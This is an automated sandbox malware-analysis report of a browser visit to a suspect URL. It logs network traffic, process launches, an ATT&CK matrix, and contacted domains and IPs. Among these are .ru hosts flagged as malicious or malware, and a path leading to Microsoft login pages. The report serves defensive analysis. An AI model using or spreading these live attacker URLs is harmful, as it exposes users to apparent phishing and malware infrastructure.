Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 58450 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58433 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58433
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 58453 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58454
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58453
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58450
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58433 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58453 version: TLS 1.2
Source: classification engineClassification label: mal52.win@28/76@43/17
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=1960,i,10537831139675820418,16280064094010099974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jantaexpress.com/UyRV4rC"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=1960,i,10537831139675820418,16280064094010099974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://jantaexpress.com/UyRV4rC0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://sensoreum.com/favicon.ico0%Avira URL Cloudsafe
https://sensoreum.com/0%Avira URL Cloudsafe
https://hbv.julfolusi.ru/favicon.ico0%Avira URL Cloudsafe
https://pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru/dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDF100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www.tm.ak.prd.aadg.trafficmanager.net
40.126.32.68
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      e329293.dscd.akamaiedge.net
      2.23.227.214
      truefalse
        high
        b-0004.b-msedge.net
        13.107.6.156
        truefalse
          high
          s-part-0017.t-0009.fb-t-msedge.net
          13.107.253.45
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              a1894.dscb.akamai.net
              2.19.126.146
              truefalse
                high
                sensoreum.com
                66.63.187.232
                truetrue
                  unknown
                  hbv.julfolusi.ru
                  188.114.96.3
                  truetrue
                    unknown
                    code.jquery.com
                    151.101.66.137
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        high
                        challenges.cloudflare.com
                        104.18.95.41
                        truefalse
                          high
                          www.google.com
                          142.250.186.36
                          truefalse
                            high
                            pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru
                            172.67.169.197
                            truefalse
                              unknown
                              jantaexpress.com
                              83.217.208.10
                              truefalse
                                unknown
                                www.office.com
                                unknown
                                unknownfalse
                                  high
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    high
                                    identity.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      login.microsoftonline.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        http://sensoreum.com/false
                                          unknown
                                          https://login.microsoftonline.com/common/GetCredentialType?mkt=en-USfalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=904f584ecef78c84&lang=autofalse
                                              high
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                high
                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                  high
                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                    high
                                                    https://challenges.cloudflare.com/turnstile/v0/g/672eb098a9f3/api.jsfalse
                                                      high
                                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/false
                                                          high
                                                          https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2false
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_false
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                high
                                                                https://pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru/dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDFfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://a.nel.cloudflare.com/report/v4?s=GA0KAF6bvAJqRzc9MT1TOuiCu7hTdqEDnnOwxXUGv9AwdQPkS7xFpUL%2BnFhtIWMNaUI3Z6mHq0oWe0I4VA8%2BVw17GcNYUd4ceEK%2BhcVdhPNeC5tDa%2FTmYZIaivx%2BYw%3D%3Dfalse
                                                                  high
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azffalse
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/904f584ecef78c84/1737379050574/6d3f33c5b10c262f317bed783b809dbc85efecad46729463c647b32eaa53d57b/QHQMfPl58w8-qkHfalse
                                                                      high
                                                                      https://www.office.com/loginfalse
                                                                        high
                                                                        https://hbv.julfolusi.ru/CZ8MDTsC/true
                                                                          unknown
                                                                          https://hbv.julfolusi.ru/favicon.icofalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://sensoreum.com/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://sensoreum.com/favicon.icofalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://login.microsoftonline.comchromecache_146.3.dr, chromecache_135.3.drfalse
                                                                            high
                                                                            https://login.windows-ppe.netchromecache_146.3.dr, chromecache_135.3.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              13.107.6.156
                                                                              b-0004.b-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              104.18.94.41
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              2.19.126.146
                                                                              a1894.dscb.akamai.netEuropean Union
                                                                              16625AKAMAI-ASUSfalse
                                                                              66.63.187.232
                                                                              sensoreum.comUnited States
                                                                              8100ASN-QUADRANET-GLOBALUStrue
                                                                              151.101.66.137
                                                                              code.jquery.comUnited States
                                                                              54113FASTLYUSfalse
                                                                              83.217.208.10
                                                                              jantaexpress.comRussian Federation
                                                                              31514INF-NET-ASRUfalse
                                                                              151.101.194.137
                                                                              unknownUnited States
                                                                              54113FASTLYUSfalse
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              104.17.24.14
                                                                              cdnjs.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              142.250.186.36
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              104.18.95.41
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              172.67.169.197
                                                                              pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ruUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              20.190.159.0
                                                                              unknownUnited States
                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              188.114.96.3
                                                                              hbv.julfolusi.ruEuropean Union
                                                                              13335CLOUDFLARENETUStrue
                                                                              104.17.25.14
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.6
                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1595141
                                                                              Start date and time:2025-01-20 14:16:15 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 3m 17s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:browseurl.jbs
                                                                              Sample URL:https://jantaexpress.com/UyRV4rC
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:11
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal52.win@28/76@43/17
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.78, 66.102.1.84, 172.217.18.3, 142.250.181.238, 216.58.206.78, 2.17.190.73, 217.20.57.35, 142.250.184.206, 216.58.206.46, 172.217.18.14, 40.126.32.133, 20.190.160.14, 40.126.32.72, 40.126.32.140, 40.126.32.74, 20.190.160.17, 40.126.32.68, 40.126.32.138, 20.190.160.22, 40.126.32.134, 40.126.32.76, 20.190.160.20, 142.250.74.206, 216.58.206.42, 142.250.184.234, 142.250.185.170, 172.217.16.202, 142.250.185.106, 142.250.186.170, 172.217.23.106, 142.250.181.234, 142.250.185.74, 142.250.185.202, 142.250.186.138, 142.250.74.202, 142.250.186.106, 142.250.185.234, 142.250.184.202, 172.217.18.10, 172.217.16.206, 20.50.73.10, 20.50.80.214, 142.250.80.46, 74.125.0.102, 142.250.185.110, 142.250.185.131, 199.232.214.172, 13.107.253.45, 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, onedscolprdneu11.northeurope.cloudapp.azure.com, login.mso.msidentity.com, r1---sn-t0aekn7e.gvt1.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, onedscolprdneu04.northeurope.cloudapp.azure.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, www.tm.aadcdn.msftauth.akadns.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, www.tm.lg.prod
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: https://jantaexpress.com/UyRV4rC
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                              Category:downloaded
                                                                              Size (bytes):61052
                                                                              Entropy (8bit):7.996159932827634
                                                                              Encrypted:true
                                                                              SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                              MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                              SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                              SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                              SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                              Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):3452
                                                                              Entropy (8bit):5.117912766689607
                                                                              Encrypted:false
                                                                              SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                              MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                              SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                              SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
